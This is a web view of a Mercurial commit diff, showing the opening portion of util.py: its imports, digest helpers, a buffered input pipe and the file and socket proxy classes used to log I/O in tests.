##// END OF EJS Templates
py3: cast attribute name to sysstr in clearcachedproperty()
Yuya Nishihara -
r40725:475921a3 default
parent child Browse files
Show More
@@ -1,3986 +1,3987 b''
1 1 # util.py - Mercurial utility functions and platform specific implementations
2 2 #
3 3 # Copyright 2005 K. Thananchayan <thananck@yahoo.com>
4 4 # Copyright 2005-2007 Matt Mackall <mpm@selenic.com>
5 5 # Copyright 2006 Vadim Gelfer <vadim.gelfer@gmail.com>
6 6 #
7 7 # This software may be used and distributed according to the terms of the
8 8 # GNU General Public License version 2 or any later version.
9 9
10 10 """Mercurial utility functions and platform specific implementations.
11 11
12 12 This contains helper routines that are independent of the SCM core and
13 13 hide platform-specific details from the core.
14 14 """
15 15
16 16 from __future__ import absolute_import, print_function
17 17
18 18 import abc
19 19 import bz2
20 20 import collections
21 21 import contextlib
22 22 import errno
23 23 import gc
24 24 import hashlib
25 25 import itertools
26 26 import mmap
27 27 import os
28 28 import platform as pyplatform
29 29 import re as remod
30 30 import shutil
31 31 import socket
32 32 import stat
33 33 import sys
34 34 import time
35 35 import traceback
36 36 import warnings
37 37 import zlib
38 38
39 39 from .thirdparty import (
40 40 attr,
41 41 )
42 42 from hgdemandimport import tracing
43 43 from . import (
44 44 encoding,
45 45 error,
46 46 i18n,
47 47 node as nodemod,
48 48 policy,
49 49 pycompat,
50 50 urllibcompat,
51 51 )
52 52 from .utils import (
53 53 procutil,
54 54 stringutil,
55 55 )
56 56
57 57 base85 = policy.importmod(r'base85')
58 58 osutil = policy.importmod(r'osutil')
59 59 parsers = policy.importmod(r'parsers')
60 60
61 61 b85decode = base85.b85decode
62 62 b85encode = base85.b85encode
63 63
64 64 cookielib = pycompat.cookielib
65 65 httplib = pycompat.httplib
66 66 pickle = pycompat.pickle
67 67 safehasattr = pycompat.safehasattr
68 68 socketserver = pycompat.socketserver
69 69 bytesio = pycompat.bytesio
70 70 # TODO deprecate stringio name, as it is a lie on Python 3.
71 71 stringio = bytesio
72 72 xmlrpclib = pycompat.xmlrpclib
73 73
74 74 httpserver = urllibcompat.httpserver
75 75 urlerr = urllibcompat.urlerr
76 76 urlreq = urllibcompat.urlreq
77 77
78 78 # workaround for win32mbcs
79 79 _filenamebytestr = pycompat.bytestr
80 80
81 81 if pycompat.iswindows:
82 82 from . import windows as platform
83 83 else:
84 84 from . import posix as platform
85 85
86 86 _ = i18n._
87 87
88 88 bindunixsocket = platform.bindunixsocket
89 89 cachestat = platform.cachestat
90 90 checkexec = platform.checkexec
91 91 checklink = platform.checklink
92 92 copymode = platform.copymode
93 93 expandglobs = platform.expandglobs
94 94 getfsmountpoint = platform.getfsmountpoint
95 95 getfstype = platform.getfstype
96 96 groupmembers = platform.groupmembers
97 97 groupname = platform.groupname
98 98 isexec = platform.isexec
99 99 isowner = platform.isowner
100 100 listdir = osutil.listdir
101 101 localpath = platform.localpath
102 102 lookupreg = platform.lookupreg
103 103 makedir = platform.makedir
104 104 nlinks = platform.nlinks
105 105 normpath = platform.normpath
106 106 normcase = platform.normcase
107 107 normcasespec = platform.normcasespec
108 108 normcasefallback = platform.normcasefallback
109 109 openhardlinks = platform.openhardlinks
110 110 oslink = platform.oslink
111 111 parsepatchoutput = platform.parsepatchoutput
112 112 pconvert = platform.pconvert
113 113 poll = platform.poll
114 114 posixfile = platform.posixfile
115 115 readlink = platform.readlink
116 116 rename = platform.rename
117 117 removedirs = platform.removedirs
118 118 samedevice = platform.samedevice
119 119 samefile = platform.samefile
120 120 samestat = platform.samestat
121 121 setflags = platform.setflags
122 122 split = platform.split
123 123 statfiles = getattr(osutil, 'statfiles', platform.statfiles)
124 124 statisexec = platform.statisexec
125 125 statislink = platform.statislink
126 126 umask = platform.umask
127 127 unlink = platform.unlink
128 128 username = platform.username
129 129
130 130 try:
131 131 recvfds = osutil.recvfds
132 132 except AttributeError:
133 133 pass
134 134
135 135 # Python compatibility
136 136
137 137 _notset = object()
138 138
139 139 def bitsfrom(container):
140 140 bits = 0
141 141 for bit in container:
142 142 bits |= bit
143 143 return bits
144 144
145 145 # python 2.6 still have deprecation warning enabled by default. We do not want
146 146 # to display anything to standard user so detect if we are running test and
147 147 # only use python deprecation warning in this case.
148 148 _dowarn = bool(encoding.environ.get('HGEMITWARNINGS'))
149 149 if _dowarn:
150 150 # explicitly unfilter our warning for python 2.7
151 151 #
152 152 # The option of setting PYTHONWARNINGS in the test runner was investigated.
153 153 # However, module name set through PYTHONWARNINGS was exactly matched, so
154 154 # we cannot set 'mercurial' and have it match eg: 'mercurial.scmutil'. This
155 155 # makes the whole PYTHONWARNINGS thing useless for our usecase.
156 156 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'mercurial')
157 157 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'hgext')
158 158 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'hgext3rd')
159 159 if _dowarn and pycompat.ispy3:
160 160 # silence warning emitted by passing user string to re.sub()
161 161 warnings.filterwarnings(r'ignore', r'bad escape', DeprecationWarning,
162 162 r'mercurial')
163 163 warnings.filterwarnings(r'ignore', r'invalid escape sequence',
164 164 DeprecationWarning, r'mercurial')
165 165 # TODO: reinvent imp.is_frozen()
166 166 warnings.filterwarnings(r'ignore', r'the imp module is deprecated',
167 167 DeprecationWarning, r'mercurial')
168 168
169 169 def nouideprecwarn(msg, version, stacklevel=1):
170 170 """Issue an python native deprecation warning
171 171
172 172 This is a noop outside of tests, use 'ui.deprecwarn' when possible.
173 173 """
174 174 if _dowarn:
175 175 msg += ("\n(compatibility will be dropped after Mercurial-%s,"
176 176 " update your code.)") % version
177 177 warnings.warn(pycompat.sysstr(msg), DeprecationWarning, stacklevel + 1)
178 178
179 179 DIGESTS = {
180 180 'md5': hashlib.md5,
181 181 'sha1': hashlib.sha1,
182 182 'sha512': hashlib.sha512,
183 183 }
184 184 # List of digest types from strongest to weakest
185 185 DIGESTS_BY_STRENGTH = ['sha512', 'sha1', 'md5']
186 186
187 187 for k in DIGESTS_BY_STRENGTH:
188 188 assert k in DIGESTS
189 189
190 190 class digester(object):
191 191 """helper to compute digests.
192 192
193 193 This helper can be used to compute one or more digests given their name.
194 194
195 195 >>> d = digester([b'md5', b'sha1'])
196 196 >>> d.update(b'foo')
197 197 >>> [k for k in sorted(d)]
198 198 ['md5', 'sha1']
199 199 >>> d[b'md5']
200 200 'acbd18db4cc2f85cedef654fccc4a4d8'
201 201 >>> d[b'sha1']
202 202 '0beec7b5ea3f0fdbc95d0dd47f3c5bc275da8a33'
203 203 >>> digester.preferred([b'md5', b'sha1'])
204 204 'sha1'
205 205 """
206 206
207 207 def __init__(self, digests, s=''):
208 208 self._hashes = {}
209 209 for k in digests:
210 210 if k not in DIGESTS:
211 211 raise error.Abort(_('unknown digest type: %s') % k)
212 212 self._hashes[k] = DIGESTS[k]()
213 213 if s:
214 214 self.update(s)
215 215
216 216 def update(self, data):
217 217 for h in self._hashes.values():
218 218 h.update(data)
219 219
220 220 def __getitem__(self, key):
221 221 if key not in DIGESTS:
222 222 raise error.Abort(_('unknown digest type: %s') % k)
223 223 return nodemod.hex(self._hashes[key].digest())
224 224
225 225 def __iter__(self):
226 226 return iter(self._hashes)
227 227
228 228 @staticmethod
229 229 def preferred(supported):
230 230 """returns the strongest digest type in both supported and DIGESTS."""
231 231
232 232 for k in DIGESTS_BY_STRENGTH:
233 233 if k in supported:
234 234 return k
235 235 return None
236 236
237 237 class digestchecker(object):
238 238 """file handle wrapper that additionally checks content against a given
239 239 size and digests.
240 240
241 241 d = digestchecker(fh, size, {'md5': '...'})
242 242
243 243 When multiple digests are given, all of them are validated.
244 244 """
245 245
246 246 def __init__(self, fh, size, digests):
247 247 self._fh = fh
248 248 self._size = size
249 249 self._got = 0
250 250 self._digests = dict(digests)
251 251 self._digester = digester(self._digests.keys())
252 252
253 253 def read(self, length=-1):
254 254 content = self._fh.read(length)
255 255 self._digester.update(content)
256 256 self._got += len(content)
257 257 return content
258 258
259 259 def validate(self):
260 260 if self._size != self._got:
261 261 raise error.Abort(_('size mismatch: expected %d, got %d') %
262 262 (self._size, self._got))
263 263 for k, v in self._digests.items():
264 264 if v != self._digester[k]:
265 265 # i18n: first parameter is a digest name
266 266 raise error.Abort(_('%s mismatch: expected %s, got %s') %
267 267 (k, v, self._digester[k]))
268 268
269 269 try:
270 270 buffer = buffer
271 271 except NameError:
272 272 def buffer(sliceable, offset=0, length=None):
273 273 if length is not None:
274 274 return memoryview(sliceable)[offset:offset + length]
275 275 return memoryview(sliceable)[offset:]
276 276
277 277 _chunksize = 4096
278 278
279 279 class bufferedinputpipe(object):
280 280 """a manually buffered input pipe
281 281
282 282 Python will not let us use buffered IO and lazy reading with 'polling' at
283 283 the same time. We cannot probe the buffer state and select will not detect
284 284 that data are ready to read if they are already buffered.
285 285
286 286 This class let us work around that by implementing its own buffering
287 287 (allowing efficient readline) while offering a way to know if the buffer is
288 288 empty from the output (allowing collaboration of the buffer with polling).
289 289
290 290 This class lives in the 'util' module because it makes use of the 'os'
291 291 module from the python stdlib.
292 292 """
293 293 def __new__(cls, fh):
294 294 # If we receive a fileobjectproxy, we need to use a variation of this
295 295 # class that notifies observers about activity.
296 296 if isinstance(fh, fileobjectproxy):
297 297 cls = observedbufferedinputpipe
298 298
299 299 return super(bufferedinputpipe, cls).__new__(cls)
300 300
301 301 def __init__(self, input):
302 302 self._input = input
303 303 self._buffer = []
304 304 self._eof = False
305 305 self._lenbuf = 0
306 306
307 307 @property
308 308 def hasbuffer(self):
309 309 """True is any data is currently buffered
310 310
311 311 This will be used externally a pre-step for polling IO. If there is
312 312 already data then no polling should be set in place."""
313 313 return bool(self._buffer)
314 314
315 315 @property
316 316 def closed(self):
317 317 return self._input.closed
318 318
319 319 def fileno(self):
320 320 return self._input.fileno()
321 321
322 322 def close(self):
323 323 return self._input.close()
324 324
325 325 def read(self, size):
326 326 while (not self._eof) and (self._lenbuf < size):
327 327 self._fillbuffer()
328 328 return self._frombuffer(size)
329 329
330 330 def unbufferedread(self, size):
331 331 if not self._eof and self._lenbuf == 0:
332 332 self._fillbuffer(max(size, _chunksize))
333 333 return self._frombuffer(min(self._lenbuf, size))
334 334
335 335 def readline(self, *args, **kwargs):
336 336 if len(self._buffer) > 1:
337 337 # this should not happen because both read and readline end with a
338 338 # _frombuffer call that collapse it.
339 339 self._buffer = [''.join(self._buffer)]
340 340 self._lenbuf = len(self._buffer[0])
341 341 lfi = -1
342 342 if self._buffer:
343 343 lfi = self._buffer[-1].find('\n')
344 344 while (not self._eof) and lfi < 0:
345 345 self._fillbuffer()
346 346 if self._buffer:
347 347 lfi = self._buffer[-1].find('\n')
348 348 size = lfi + 1
349 349 if lfi < 0: # end of file
350 350 size = self._lenbuf
351 351 elif len(self._buffer) > 1:
352 352 # we need to take previous chunks into account
353 353 size += self._lenbuf - len(self._buffer[-1])
354 354 return self._frombuffer(size)
355 355
356 356 def _frombuffer(self, size):
357 357 """return at most 'size' data from the buffer
358 358
359 359 The data are removed from the buffer."""
360 360 if size == 0 or not self._buffer:
361 361 return ''
362 362 buf = self._buffer[0]
363 363 if len(self._buffer) > 1:
364 364 buf = ''.join(self._buffer)
365 365
366 366 data = buf[:size]
367 367 buf = buf[len(data):]
368 368 if buf:
369 369 self._buffer = [buf]
370 370 self._lenbuf = len(buf)
371 371 else:
372 372 self._buffer = []
373 373 self._lenbuf = 0
374 374 return data
375 375
376 376 def _fillbuffer(self, size=_chunksize):
377 377 """read data to the buffer"""
378 378 data = os.read(self._input.fileno(), size)
379 379 if not data:
380 380 self._eof = True
381 381 else:
382 382 self._lenbuf += len(data)
383 383 self._buffer.append(data)
384 384
385 385 return data
386 386
387 387 def mmapread(fp):
388 388 try:
389 389 fd = getattr(fp, 'fileno', lambda: fp)()
390 390 return mmap.mmap(fd, 0, access=mmap.ACCESS_READ)
391 391 except ValueError:
392 392 # Empty files cannot be mmapped, but mmapread should still work. Check
393 393 # if the file is empty, and if so, return an empty buffer.
394 394 if os.fstat(fd).st_size == 0:
395 395 return ''
396 396 raise
397 397
398 398 class fileobjectproxy(object):
399 399 """A proxy around file objects that tells a watcher when events occur.
400 400
401 401 This type is intended to only be used for testing purposes. Think hard
402 402 before using it in important code.
403 403 """
404 404 __slots__ = (
405 405 r'_orig',
406 406 r'_observer',
407 407 )
408 408
409 409 def __init__(self, fh, observer):
410 410 object.__setattr__(self, r'_orig', fh)
411 411 object.__setattr__(self, r'_observer', observer)
412 412
413 413 def __getattribute__(self, name):
414 414 ours = {
415 415 r'_observer',
416 416
417 417 # IOBase
418 418 r'close',
419 419 # closed if a property
420 420 r'fileno',
421 421 r'flush',
422 422 r'isatty',
423 423 r'readable',
424 424 r'readline',
425 425 r'readlines',
426 426 r'seek',
427 427 r'seekable',
428 428 r'tell',
429 429 r'truncate',
430 430 r'writable',
431 431 r'writelines',
432 432 # RawIOBase
433 433 r'read',
434 434 r'readall',
435 435 r'readinto',
436 436 r'write',
437 437 # BufferedIOBase
438 438 # raw is a property
439 439 r'detach',
440 440 # read defined above
441 441 r'read1',
442 442 # readinto defined above
443 443 # write defined above
444 444 }
445 445
446 446 # We only observe some methods.
447 447 if name in ours:
448 448 return object.__getattribute__(self, name)
449 449
450 450 return getattr(object.__getattribute__(self, r'_orig'), name)
451 451
452 452 def __nonzero__(self):
453 453 return bool(object.__getattribute__(self, r'_orig'))
454 454
455 455 __bool__ = __nonzero__
456 456
457 457 def __delattr__(self, name):
458 458 return delattr(object.__getattribute__(self, r'_orig'), name)
459 459
460 460 def __setattr__(self, name, value):
461 461 return setattr(object.__getattribute__(self, r'_orig'), name, value)
462 462
463 463 def __iter__(self):
464 464 return object.__getattribute__(self, r'_orig').__iter__()
465 465
466 466 def _observedcall(self, name, *args, **kwargs):
467 467 # Call the original object.
468 468 orig = object.__getattribute__(self, r'_orig')
469 469 res = getattr(orig, name)(*args, **kwargs)
470 470
471 471 # Call a method on the observer of the same name with arguments
472 472 # so it can react, log, etc.
473 473 observer = object.__getattribute__(self, r'_observer')
474 474 fn = getattr(observer, name, None)
475 475 if fn:
476 476 fn(res, *args, **kwargs)
477 477
478 478 return res
479 479
480 480 def close(self, *args, **kwargs):
481 481 return object.__getattribute__(self, r'_observedcall')(
482 482 r'close', *args, **kwargs)
483 483
484 484 def fileno(self, *args, **kwargs):
485 485 return object.__getattribute__(self, r'_observedcall')(
486 486 r'fileno', *args, **kwargs)
487 487
488 488 def flush(self, *args, **kwargs):
489 489 return object.__getattribute__(self, r'_observedcall')(
490 490 r'flush', *args, **kwargs)
491 491
492 492 def isatty(self, *args, **kwargs):
493 493 return object.__getattribute__(self, r'_observedcall')(
494 494 r'isatty', *args, **kwargs)
495 495
496 496 def readable(self, *args, **kwargs):
497 497 return object.__getattribute__(self, r'_observedcall')(
498 498 r'readable', *args, **kwargs)
499 499
500 500 def readline(self, *args, **kwargs):
501 501 return object.__getattribute__(self, r'_observedcall')(
502 502 r'readline', *args, **kwargs)
503 503
504 504 def readlines(self, *args, **kwargs):
505 505 return object.__getattribute__(self, r'_observedcall')(
506 506 r'readlines', *args, **kwargs)
507 507
508 508 def seek(self, *args, **kwargs):
509 509 return object.__getattribute__(self, r'_observedcall')(
510 510 r'seek', *args, **kwargs)
511 511
512 512 def seekable(self, *args, **kwargs):
513 513 return object.__getattribute__(self, r'_observedcall')(
514 514 r'seekable', *args, **kwargs)
515 515
516 516 def tell(self, *args, **kwargs):
517 517 return object.__getattribute__(self, r'_observedcall')(
518 518 r'tell', *args, **kwargs)
519 519
520 520 def truncate(self, *args, **kwargs):
521 521 return object.__getattribute__(self, r'_observedcall')(
522 522 r'truncate', *args, **kwargs)
523 523
524 524 def writable(self, *args, **kwargs):
525 525 return object.__getattribute__(self, r'_observedcall')(
526 526 r'writable', *args, **kwargs)
527 527
528 528 def writelines(self, *args, **kwargs):
529 529 return object.__getattribute__(self, r'_observedcall')(
530 530 r'writelines', *args, **kwargs)
531 531
532 532 def read(self, *args, **kwargs):
533 533 return object.__getattribute__(self, r'_observedcall')(
534 534 r'read', *args, **kwargs)
535 535
536 536 def readall(self, *args, **kwargs):
537 537 return object.__getattribute__(self, r'_observedcall')(
538 538 r'readall', *args, **kwargs)
539 539
540 540 def readinto(self, *args, **kwargs):
541 541 return object.__getattribute__(self, r'_observedcall')(
542 542 r'readinto', *args, **kwargs)
543 543
544 544 def write(self, *args, **kwargs):
545 545 return object.__getattribute__(self, r'_observedcall')(
546 546 r'write', *args, **kwargs)
547 547
548 548 def detach(self, *args, **kwargs):
549 549 return object.__getattribute__(self, r'_observedcall')(
550 550 r'detach', *args, **kwargs)
551 551
552 552 def read1(self, *args, **kwargs):
553 553 return object.__getattribute__(self, r'_observedcall')(
554 554 r'read1', *args, **kwargs)
555 555
556 556 class observedbufferedinputpipe(bufferedinputpipe):
557 557 """A variation of bufferedinputpipe that is aware of fileobjectproxy.
558 558
559 559 ``bufferedinputpipe`` makes low-level calls to ``os.read()`` that
560 560 bypass ``fileobjectproxy``. Because of this, we need to make
561 561 ``bufferedinputpipe`` aware of these operations.
562 562
563 563 This variation of ``bufferedinputpipe`` can notify observers about
564 564 ``os.read()`` events. It also re-publishes other events, such as
565 565 ``read()`` and ``readline()``.
566 566 """
567 567 def _fillbuffer(self):
568 568 res = super(observedbufferedinputpipe, self)._fillbuffer()
569 569
570 570 fn = getattr(self._input._observer, r'osread', None)
571 571 if fn:
572 572 fn(res, _chunksize)
573 573
574 574 return res
575 575
576 576 # We use different observer methods because the operation isn't
577 577 # performed on the actual file object but on us.
578 578 def read(self, size):
579 579 res = super(observedbufferedinputpipe, self).read(size)
580 580
581 581 fn = getattr(self._input._observer, r'bufferedread', None)
582 582 if fn:
583 583 fn(res, size)
584 584
585 585 return res
586 586
587 587 def readline(self, *args, **kwargs):
588 588 res = super(observedbufferedinputpipe, self).readline(*args, **kwargs)
589 589
590 590 fn = getattr(self._input._observer, r'bufferedreadline', None)
591 591 if fn:
592 592 fn(res)
593 593
594 594 return res
595 595
596 596 PROXIED_SOCKET_METHODS = {
597 597 r'makefile',
598 598 r'recv',
599 599 r'recvfrom',
600 600 r'recvfrom_into',
601 601 r'recv_into',
602 602 r'send',
603 603 r'sendall',
604 604 r'sendto',
605 605 r'setblocking',
606 606 r'settimeout',
607 607 r'gettimeout',
608 608 r'setsockopt',
609 609 }
610 610
611 611 class socketproxy(object):
612 612 """A proxy around a socket that tells a watcher when events occur.
613 613
614 614 This is like ``fileobjectproxy`` except for sockets.
615 615
616 616 This type is intended to only be used for testing purposes. Think hard
617 617 before using it in important code.
618 618 """
619 619 __slots__ = (
620 620 r'_orig',
621 621 r'_observer',
622 622 )
623 623
624 624 def __init__(self, sock, observer):
625 625 object.__setattr__(self, r'_orig', sock)
626 626 object.__setattr__(self, r'_observer', observer)
627 627
628 628 def __getattribute__(self, name):
629 629 if name in PROXIED_SOCKET_METHODS:
630 630 return object.__getattribute__(self, name)
631 631
632 632 return getattr(object.__getattribute__(self, r'_orig'), name)
633 633
634 634 def __delattr__(self, name):
635 635 return delattr(object.__getattribute__(self, r'_orig'), name)
636 636
637 637 def __setattr__(self, name, value):
638 638 return setattr(object.__getattribute__(self, r'_orig'), name, value)
639 639
640 640 def __nonzero__(self):
641 641 return bool(object.__getattribute__(self, r'_orig'))
642 642
643 643 __bool__ = __nonzero__
644 644
645 645 def _observedcall(self, name, *args, **kwargs):
646 646 # Call the original object.
647 647 orig = object.__getattribute__(self, r'_orig')
648 648 res = getattr(orig, name)(*args, **kwargs)
649 649
650 650 # Call a method on the observer of the same name with arguments
651 651 # so it can react, log, etc.
652 652 observer = object.__getattribute__(self, r'_observer')
653 653 fn = getattr(observer, name, None)
654 654 if fn:
655 655 fn(res, *args, **kwargs)
656 656
657 657 return res
658 658
659 659 def makefile(self, *args, **kwargs):
660 660 res = object.__getattribute__(self, r'_observedcall')(
661 661 r'makefile', *args, **kwargs)
662 662
663 663 # The file object may be used for I/O. So we turn it into a
664 664 # proxy using our observer.
665 665 observer = object.__getattribute__(self, r'_observer')
666 666 return makeloggingfileobject(observer.fh, res, observer.name,
667 667 reads=observer.reads,
668 668 writes=observer.writes,
669 669 logdata=observer.logdata,
670 670 logdataapis=observer.logdataapis)
671 671
672 672 def recv(self, *args, **kwargs):
673 673 return object.__getattribute__(self, r'_observedcall')(
674 674 r'recv', *args, **kwargs)
675 675
676 676 def recvfrom(self, *args, **kwargs):
677 677 return object.__getattribute__(self, r'_observedcall')(
678 678 r'recvfrom', *args, **kwargs)
679 679
680 680 def recvfrom_into(self, *args, **kwargs):
681 681 return object.__getattribute__(self, r'_observedcall')(
682 682 r'recvfrom_into', *args, **kwargs)
683 683
684 684 def recv_into(self, *args, **kwargs):
685 685 return object.__getattribute__(self, r'_observedcall')(
686 686 r'recv_info', *args, **kwargs)
687 687
688 688 def send(self, *args, **kwargs):
689 689 return object.__getattribute__(self, r'_observedcall')(
690 690 r'send', *args, **kwargs)
691 691
692 692 def sendall(self, *args, **kwargs):
693 693 return object.__getattribute__(self, r'_observedcall')(
694 694 r'sendall', *args, **kwargs)
695 695
696 696 def sendto(self, *args, **kwargs):
697 697 return object.__getattribute__(self, r'_observedcall')(
698 698 r'sendto', *args, **kwargs)
699 699
700 700 def setblocking(self, *args, **kwargs):
701 701 return object.__getattribute__(self, r'_observedcall')(
702 702 r'setblocking', *args, **kwargs)
703 703
704 704 def settimeout(self, *args, **kwargs):
705 705 return object.__getattribute__(self, r'_observedcall')(
706 706 r'settimeout', *args, **kwargs)
707 707
708 708 def gettimeout(self, *args, **kwargs):
709 709 return object.__getattribute__(self, r'_observedcall')(
710 710 r'gettimeout', *args, **kwargs)
711 711
712 712 def setsockopt(self, *args, **kwargs):
713 713 return object.__getattribute__(self, r'_observedcall')(
714 714 r'setsockopt', *args, **kwargs)
715 715
716 716 class baseproxyobserver(object):
717 717 def _writedata(self, data):
718 718 if not self.logdata:
719 719 if self.logdataapis:
720 720 self.fh.write('\n')
721 721 self.fh.flush()
722 722 return
723 723
724 724 # Simple case writes all data on a single line.
725 725 if b'\n' not in data:
726 726 if self.logdataapis:
727 727 self.fh.write(': %s\n' % stringutil.escapestr(data))
728 728 else:
729 729 self.fh.write('%s> %s\n'
730 730 % (self.name, stringutil.escapestr(data)))
731 731 self.fh.flush()
732 732 return
733 733
734 734 # Data with newlines is written to multiple lines.
735 735 if self.logdataapis:
736 736 self.fh.write(':\n')
737 737
738 738 lines = data.splitlines(True)
739 739 for line in lines:
740 740 self.fh.write('%s> %s\n'
741 741 % (self.name, stringutil.escapestr(line)))
742 742 self.fh.flush()
743 743
744 744 class fileobjectobserver(baseproxyobserver):
745 745 """Logs file object activity."""
746 746 def __init__(self, fh, name, reads=True, writes=True, logdata=False,
747 747 logdataapis=True):
748 748 self.fh = fh
749 749 self.name = name
750 750 self.logdata = logdata
751 751 self.logdataapis = logdataapis
752 752 self.reads = reads
753 753 self.writes = writes
754 754
755 755 def read(self, res, size=-1):
756 756 if not self.reads:
757 757 return
758 758 # Python 3 can return None from reads at EOF instead of empty strings.
759 759 if res is None:
760 760 res = ''
761 761
762 762 if size == -1 and res == '':
763 763 # Suppress pointless read(-1) calls that return
764 764 # nothing. These happen _a lot_ on Python 3, and there
765 765 # doesn't seem to be a better workaround to have matching
766 766 # Python 2 and 3 behavior. :(
767 767 return
768 768
769 769 if self.logdataapis:
770 770 self.fh.write('%s> read(%d) -> %d' % (self.name, size, len(res)))
771 771
772 772 self._writedata(res)
773 773
774 774 def readline(self, res, limit=-1):
775 775 if not self.reads:
776 776 return
777 777
778 778 if self.logdataapis:
779 779 self.fh.write('%s> readline() -> %d' % (self.name, len(res)))
780 780
781 781 self._writedata(res)
782 782
783 783 def readinto(self, res, dest):
784 784 if not self.reads:
785 785 return
786 786
787 787 if self.logdataapis:
788 788 self.fh.write('%s> readinto(%d) -> %r' % (self.name, len(dest),
789 789 res))
790 790
791 791 data = dest[0:res] if res is not None else b''
792 792 self._writedata(data)
793 793
794 794 def write(self, res, data):
795 795 if not self.writes:
796 796 return
797 797
798 798 # Python 2 returns None from some write() calls. Python 3 (reasonably)
799 799 # returns the integer bytes written.
800 800 if res is None and data:
801 801 res = len(data)
802 802
803 803 if self.logdataapis:
804 804 self.fh.write('%s> write(%d) -> %r' % (self.name, len(data), res))
805 805
806 806 self._writedata(data)
807 807
808 808 def flush(self, res):
809 809 if not self.writes:
810 810 return
811 811
812 812 self.fh.write('%s> flush() -> %r\n' % (self.name, res))
813 813
814 814 # For observedbufferedinputpipe.
815 815 def bufferedread(self, res, size):
816 816 if not self.reads:
817 817 return
818 818
819 819 if self.logdataapis:
820 820 self.fh.write('%s> bufferedread(%d) -> %d' % (
821 821 self.name, size, len(res)))
822 822
823 823 self._writedata(res)
824 824
825 825 def bufferedreadline(self, res):
826 826 if not self.reads:
827 827 return
828 828
829 829 if self.logdataapis:
830 830 self.fh.write('%s> bufferedreadline() -> %d' % (
831 831 self.name, len(res)))
832 832
833 833 self._writedata(res)
834 834
835 835 def makeloggingfileobject(logh, fh, name, reads=True, writes=True,
836 836 logdata=False, logdataapis=True):
837 837 """Turn a file object into a logging file object."""
838 838
839 839 observer = fileobjectobserver(logh, name, reads=reads, writes=writes,
840 840 logdata=logdata, logdataapis=logdataapis)
841 841 return fileobjectproxy(fh, observer)
842 842
843 843 class socketobserver(baseproxyobserver):
844 844 """Logs socket activity."""
845 845 def __init__(self, fh, name, reads=True, writes=True, states=True,
846 846 logdata=False, logdataapis=True):
847 847 self.fh = fh
848 848 self.name = name
849 849 self.reads = reads
850 850 self.writes = writes
851 851 self.states = states
852 852 self.logdata = logdata
853 853 self.logdataapis = logdataapis
854 854
855 855 def makefile(self, res, mode=None, bufsize=None):
856 856 if not self.states:
857 857 return
858 858
859 859 self.fh.write('%s> makefile(%r, %r)\n' % (
860 860 self.name, mode, bufsize))
861 861
862 862 def recv(self, res, size, flags=0):
863 863 if not self.reads:
864 864 return
865 865
866 866 if self.logdataapis:
867 867 self.fh.write('%s> recv(%d, %d) -> %d' % (
868 868 self.name, size, flags, len(res)))
869 869 self._writedata(res)
870 870
871 871 def recvfrom(self, res, size, flags=0):
872 872 if not self.reads:
873 873 return
874 874
875 875 if self.logdataapis:
876 876 self.fh.write('%s> recvfrom(%d, %d) -> %d' % (
877 877 self.name, size, flags, len(res[0])))
878 878
879 879 self._writedata(res[0])
880 880
881 881 def recvfrom_into(self, res, buf, size, flags=0):
882 882 if not self.reads:
883 883 return
884 884
885 885 if self.logdataapis:
886 886 self.fh.write('%s> recvfrom_into(%d, %d) -> %d' % (
887 887 self.name, size, flags, res[0]))
888 888
889 889 self._writedata(buf[0:res[0]])
890 890
891 891 def recv_into(self, res, buf, size=0, flags=0):
892 892 if not self.reads:
893 893 return
894 894
895 895 if self.logdataapis:
896 896 self.fh.write('%s> recv_into(%d, %d) -> %d' % (
897 897 self.name, size, flags, res))
898 898
899 899 self._writedata(buf[0:res])
900 900
901 901 def send(self, res, data, flags=0):
902 902 if not self.writes:
903 903 return
904 904
905 905 self.fh.write('%s> send(%d, %d) -> %d' % (
906 906 self.name, len(data), flags, len(res)))
907 907 self._writedata(data)
908 908
909 909 def sendall(self, res, data, flags=0):
910 910 if not self.writes:
911 911 return
912 912
913 913 if self.logdataapis:
914 914 # Returns None on success. So don't bother reporting return value.
915 915 self.fh.write('%s> sendall(%d, %d)' % (
916 916 self.name, len(data), flags))
917 917
918 918 self._writedata(data)
919 919
920 920 def sendto(self, res, data, flagsoraddress, address=None):
921 921 if not self.writes:
922 922 return
923 923
924 924 if address:
925 925 flags = flagsoraddress
926 926 else:
927 927 flags = 0
928 928
929 929 if self.logdataapis:
930 930 self.fh.write('%s> sendto(%d, %d, %r) -> %d' % (
931 931 self.name, len(data), flags, address, res))
932 932
933 933 self._writedata(data)
934 934
935 935 def setblocking(self, res, flag):
936 936 if not self.states:
937 937 return
938 938
939 939 self.fh.write('%s> setblocking(%r)\n' % (self.name, flag))
940 940
941 941 def settimeout(self, res, value):
942 942 if not self.states:
943 943 return
944 944
945 945 self.fh.write('%s> settimeout(%r)\n' % (self.name, value))
946 946
947 947 def gettimeout(self, res):
948 948 if not self.states:
949 949 return
950 950
951 951 self.fh.write('%s> gettimeout() -> %f\n' % (self.name, res))
952 952
953 953 def setsockopt(self, res, level, optname, value):
954 954 if not self.states:
955 955 return
956 956
957 957 self.fh.write('%s> setsockopt(%r, %r, %r) -> %r\n' % (
958 958 self.name, level, optname, value, res))
959 959
960 960 def makeloggingsocket(logh, fh, name, reads=True, writes=True, states=True,
961 961 logdata=False, logdataapis=True):
962 962 """Turn a socket into a logging socket."""
963 963
964 964 observer = socketobserver(logh, name, reads=reads, writes=writes,
965 965 states=states, logdata=logdata,
966 966 logdataapis=logdataapis)
967 967 return socketproxy(fh, observer)
968 968
969 969 def version():
970 970 """Return version information if available."""
971 971 try:
972 972 from . import __version__
973 973 return __version__.version
974 974 except ImportError:
975 975 return 'unknown'
976 976
977 977 def versiontuple(v=None, n=4):
978 978 """Parses a Mercurial version string into an N-tuple.
979 979
980 980 The version string to be parsed is specified with the ``v`` argument.
981 981 If it isn't defined, the current Mercurial version string will be parsed.
982 982
983 983 ``n`` can be 2, 3, or 4. Here is how some version strings map to
984 984 returned values:
985 985
986 986 >>> v = b'3.6.1+190-df9b73d2d444'
987 987 >>> versiontuple(v, 2)
988 988 (3, 6)
989 989 >>> versiontuple(v, 3)
990 990 (3, 6, 1)
991 991 >>> versiontuple(v, 4)
992 992 (3, 6, 1, '190-df9b73d2d444')
993 993
994 994 >>> versiontuple(b'3.6.1+190-df9b73d2d444+20151118')
995 995 (3, 6, 1, '190-df9b73d2d444+20151118')
996 996
997 997 >>> v = b'3.6'
